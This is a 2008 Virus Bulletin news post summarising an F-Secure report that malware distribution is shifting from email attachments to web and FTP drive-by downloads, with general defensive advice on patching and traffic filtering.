From Simple Mail to Hypertext

Posted by   Virus Bulletin on   Mar 31, 2008

HTTP and FTP take over from SMTP as common malware spreading methods.

A report from F-Secure has highlighted the recent shift in malware spreading methods from email to web-based methods.

For many years, malware authors' preferred method of spreading their wares was to send out masses of emails that contained a piece of malware as an attachment. A suggestion in the body of the email that the attached file would somehow be of interest to the recipient then led to millions of naive users installing trojans such as Bagle and Mydoom onto their systems.

But better awareness among users, many of whom now know not to open email attachments unless they are sure of the contents, combined with the fact that many organisations now block all email containing .exe attachments, has forced malware writers to find new ways to spread their 'products'. The new preferred method seems to be the web.

There are several ways of getting malware to install itself on users' computers through the web, F-Secure reports. One way is to lure users into visiting a malicious web link sent in a spam message, while another is to create dummy websites containing many keywords and then wait for users to click links to these sites when they occur in search engine results.

An even more stealthy way of infecting users through drive-by downloads is to hack into popular legitimate websites and include a small iframe or piece of JavaScript code that uses vulnerabilities in the browser and operating systems to install malware on users' computers. Recently we reported on a mass iframe-injection that affected many popular websites, including that of at least one anti-virus vendor. Practising common sense here isn't sufficient to stay safe and the only way users can defend themselves against such attacks is by making sure their anti-virus software is up to date and their system is properly patched.

"It is important to be aware of this shift from SMTP to HTTP infections, which can be exploited by the criminals in many ways," F-Secure writes. "Companies often measure their risk of getting infected by looking at the amount of stopped attachments at their email gateway. Those numbers are definitely going down, but the actual risk of getting infected probably isn't."

The report concludes by warning that the number of emails that contain links to malware-serving FTP links is growing and urges individuals and companies to filter not only HTTP traffic but FTP traffic as well.

Posted on 31 March 2008 by Virus Bulletin



Latest posts:

VB2018 paper: Lazarus Group: a mahjong game played with different sets of tiles

The Lazarus Group, generally linked to the North Korean government, is one of the most notorious threat groups seen in recent years. At VB2018 ESET researchers Peter Kálnai and Michal Poslušný presented a paper looking at the group's various…

Book your VB2019 ticket now for a chance to win a ticket for BSides London

Virus Bulletin is proud to sponsor this year's BSides London conference, which will take place next week, and we have a number of tickets to give away.

First 11 partners of VB2019 announced

We are excited to announce the first 11 companies to partner with VB2019, whose support will help ensure a great event.

VB2018 paper: Fake News, Inc.

A former reporter by profession, Andrew Brandt's curiosity was piqued when he came across what appeared at first glance to be the website of a small-town newspaper based in Illinois, but under scrutiny, things didn’t add up. At VB2018 he presented a…

Paper: Alternative communication channel over NTP

In a new paper published today, independent researcher Nikolaos Tsapakis writes about the possibilities of malware using NTP as a covert communication channel and how to stop this.

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.